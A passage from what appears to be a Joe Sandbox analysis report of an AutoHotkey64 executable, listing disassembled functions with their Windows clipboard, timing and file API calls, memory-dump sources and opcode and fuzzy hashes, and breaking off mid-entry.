Instruction Fuzzy Hash: 7C91A2B160464486F7668B27E4843E937E1F38DBE4F11022AFB5963AF6DB38C494C745

Function 0000000140044098 Relevance: 9.2, APIs: 6, Instructions: 178windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: e08e5e1a903bf238034ff73d9a708ace7b4d99e3dd5af59e2154ff6fad838658
Instruction ID: 6f3dc10f712ad0d203b7f497cad64fc8047312882923c201f9a7e9664e41fd44
Opcode Fuzzy Hash: e08e5e1a903bf238034ff73d9a708ace7b4d99e3dd5af59e2154ff6fad838658
Instruction Fuzzy Hash: 4291B2B160464486F7668B27E4843E937E1F38DBE4F11022AFB5963AF6DB38C494C745

Function 00000001400458AF Relevance: 9.2, APIs: 6, Instructions: 178windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140054790: PostMessageW.USER32 ref: 0000000140054819

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$Message$ClipboardCloseGlobalPeekPostUnlock
String ID:
API String ID: 2416748954-0
Opcode ID: d45b79702bd42972413a7372872e89dc97f5ab776aeeec78690fa004ae149ee7
Instruction ID: 890dc5ee8afeb3f5d8e7e61f47114b41fdbee055e7b58dacb028645a92f51714
Opcode Fuzzy Hash: d45b79702bd42972413a7372872e89dc97f5ab776aeeec78690fa004ae149ee7
Instruction Fuzzy Hash: 8991B2B160464486F7668B27E4843E937E1F38DBE4F11022AFB5963AF6DB38C494C745

Function 0000000140043999 Relevance: 9.2, APIs: 6, Instructions: 178windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: f334039b6f49e02c827a2e142aa0b2ed54506feecaa304ba8595310e770e33f8
Instruction ID: 7444d0b6599f5ef5c00608e9c3384df14311d59019e427b7eb00fb4705352e16
Opcode Fuzzy Hash: f334039b6f49e02c827a2e142aa0b2ed54506feecaa304ba8595310e770e33f8
Instruction Fuzzy Hash: FE91B2B160464486F7668B27E4843E937E1F38DBE4F11022AFB5963AF6DB38C494C745

Function 0000000140045935 Relevance: 9.2, APIs: 6, Instructions: 176windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: e97682fa6f2f235f6cd0a6219472f6c553879d3ca701634b0ca82dd30a35e997
Instruction ID: ba936be2047825c428961340032be8763b6789d8ed7bb61c975aae5b0c9f62f6
Opcode Fuzzy Hash: e97682fa6f2f235f6cd0a6219472f6c553879d3ca701634b0ca82dd30a35e997
Instruction Fuzzy Hash: 3091C4B160064486F7668B27E4843E937A1F38DBE4F11022AFB5963BF6DB38C891C745

Function 0000000140045FF5 Relevance: 9.2, APIs: 6, Instructions: 175windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 7cad1e0846db67e805d68a7f67b9b0d420d7ad68da308dd02e678cecb19a3cbe
Instruction ID: 0a741dbc94f88971fd61c21a951c449ce38298cec7d1a4d2dd51f2dd760eb6c4
Opcode Fuzzy Hash: 7cad1e0846db67e805d68a7f67b9b0d420d7ad68da308dd02e678cecb19a3cbe
Instruction Fuzzy Hash: 4491C5B160064486F7668B27E4843E937A1F38DBE4F11022AFB5963BF6DB38C890C745

Function 0000000140045FE4 Relevance: 9.2, APIs: 6, Instructions: 174windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140029F30: GetClassNameW.USER32 ref: 0000000140029FC1

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClassClipboardCloseGlobalMessageNamePeekUnlock
String ID:
API String ID: 2021685357-0
Opcode ID: 547df062252438ea5782a4581cfb1aff7721c98e7fa38a39a6d37438b4476308
Instruction ID: 9d427cc45ece8f4f52cd0beaa04495fa50287390eaa0e040c0e97a915221bdd8
Opcode Fuzzy Hash: 547df062252438ea5782a4581cfb1aff7721c98e7fa38a39a6d37438b4476308
Instruction Fuzzy Hash: 7591C5B160064486F7568B27E4443E937A1F38DBE4F11022AFB5963BF6DB38C490C745

Function 0000000140045B2F Relevance: 9.2, APIs: 6, Instructions: 174windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 7638e97a80d618995ded60ab292a2e4feeb449c382e363ed80bf051bd1fe9689
Instruction ID: 09778e01e854c96d3bf78f393353ea1219f4d908c415069aae7a737867dfc1c1
Opcode Fuzzy Hash: 7638e97a80d618995ded60ab292a2e4feeb449c382e363ed80bf051bd1fe9689
Instruction Fuzzy Hash: 4691C4B160064486F7668B27E4843E937A1F34DBE4F11022AFB5963BF6DB38C490C705

Function 0000000140045B3F Relevance: 9.2, APIs: 6, Instructions: 174windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 66b158b11aba11878de28f40653878366e6424b1ab4b6b93ae36f7eb09065635
Instruction ID: e0a7d53534407a3de0f32d43d3fa476d0a9b74e39f43b15cbe488b1ece7073f5
Opcode Fuzzy Hash: 66b158b11aba11878de28f40653878366e6424b1ab4b6b93ae36f7eb09065635
Instruction Fuzzy Hash: F591B4B1604A4486F7668B27E4843E937A1F38DBE4F11022AFB5963BF6DB38C491C745

Function 0000000140045B48 Relevance: 9.2, APIs: 6, Instructions: 174windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 0f61d185164739e40051b2a178b13d18475cd06b97427be0fe49489e72085dc9
Instruction ID: 7af73580d8a5ca4c4d1527ef1e69b3cdc83c49da9a6a653a420e779cbd016933
Opcode Fuzzy Hash: 0f61d185164739e40051b2a178b13d18475cd06b97427be0fe49489e72085dc9
Instruction Fuzzy Hash: 5791C4B160464486F7668B27E4843E937A1F34DBE4F11022AFB5963BF6DB38C490C745

Function 0000000140045B22 Relevance: 9.2, APIs: 6, Instructions: 173windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 7db13675484ce9f63ee209a7b4271bc01aed531dafe5c38ed33ed7166829c2a2
Instruction ID: e44eec25c32c135d73a9fe1ac9dc83856854c2f779f347aec1d4dbab1adcc97c
Opcode Fuzzy Hash: 7db13675484ce9f63ee209a7b4271bc01aed531dafe5c38ed33ed7166829c2a2
Instruction Fuzzy Hash: 5A91B2B1604A4486F7668B27E4843E937A1F38DBE4F11022AFB5963BF6DB38C491C745

Function 0000000140041855 Relevance: 9.2, APIs: 6, Instructions: 166windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: c23000b5f556c5dc940fce508ecbe3a03c4117a04ad3ead10a38b6e7dc4e3a89
Instruction ID: 2d33edeaf427beec918169138ecea872743b9b209578f9da8f27edc12648eba9
Opcode Fuzzy Hash: c23000b5f556c5dc940fce508ecbe3a03c4117a04ad3ead10a38b6e7dc4e3a89
Instruction Fuzzy Hash: DF8192B1600A4486F7668B27E4443E937E1F78DBE4F11022AFB5963AF6DB38C891C745

Function 0000000140063B18 Relevance: 7.5, APIs: 5, Instructions: 44timeclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140063B31
CloseClipboard.USER32 ref: 0000000140063B3E
GetCurrentProcessId.KERNEL32 ref: 0000000140063B52
EnumWindows.USER32 ref: 0000000140063B6A
SetTimer.USER32 ref: 0000000140063BA7

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: ClipboardCloseCurrentEnumGlobalProcessTimerUnlockWindows
String ID:
API String ID: 555064778-0
Opcode ID: 9bfa5b7be89629b3fe067523dce8e90e1ca9dfa817620a20fcfa4591aef9d6f0
Instruction ID: 4ec8d0dc3246132210b32d0cf8cc441ad96edc7cca702a0db740b258fab86282
Opcode Fuzzy Hash: 9bfa5b7be89629b3fe067523dce8e90e1ca9dfa817620a20fcfa4591aef9d6f0
Instruction Fuzzy Hash: CB1119B1204A85C1E7528F23FC843D973B5F74CBA4F58591AAB4A67274CF38C586C380

Function 0000000140029770 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

wcsncpy.LIBCMT ref: 0000000140029821
Shell_NotifyIconW.SHELL32 ref: 0000000140029838

Strings

AutoHotkey, xrefs: 0000000140029806

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: IconNotifyShell_wcsncpy
String ID: AutoHotkey
API String ID: 1496823222-348589305
Opcode ID: b3a57a9ae667eb26bc10c09a2f8f68deca11665e86eb55f6b64405d180fdc76f
Instruction ID: a1672a62fc33957631cbfc86a03abd8bce6a23907256712cf9860b0954497a81
Opcode Fuzzy Hash: b3a57a9ae667eb26bc10c09a2f8f68deca11665e86eb55f6b64405d180fdc76f
Instruction Fuzzy Hash: 3E214AB2704B8196EB4DCF26E584799B3A0FB48BC4F045129EB6C53764DF78E5A18704

Function 00000001400BD650 Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 237COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 00000001400BD902

Strings

Memory limit reached (see #MaxMem in the help file)., xrefs: 00000001400BD74A
Out of memory., xrefs: 00000001400BD977

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: free
String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 1294909896-457448710
Opcode ID: 2ff3e0b61d6a378d928f0af6c7e46e675f26b1c1d7dd6df6245ef8f60b8dd4f4
Instruction ID: ff1df4f0d05ab5bf1abf4473e2233c1e5cf83428fa69d8212c63d9620ff36aa0
Opcode Fuzzy Hash: 2ff3e0b61d6a378d928f0af6c7e46e675f26b1c1d7dd6df6245ef8f60b8dd4f4
Instruction Fuzzy Hash: D5A1AE32604E4081EB639FA695043E9F7B1A74CBE8F544613EB5E176F9EB78C846D301

Function 00000001400B7525 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000001400B7561
GetStdHandle.KERNEL32 ref: 00000001400B761A
CreateFileW.KERNELBASE ref: 00000001400B766F

Memory Dump Source

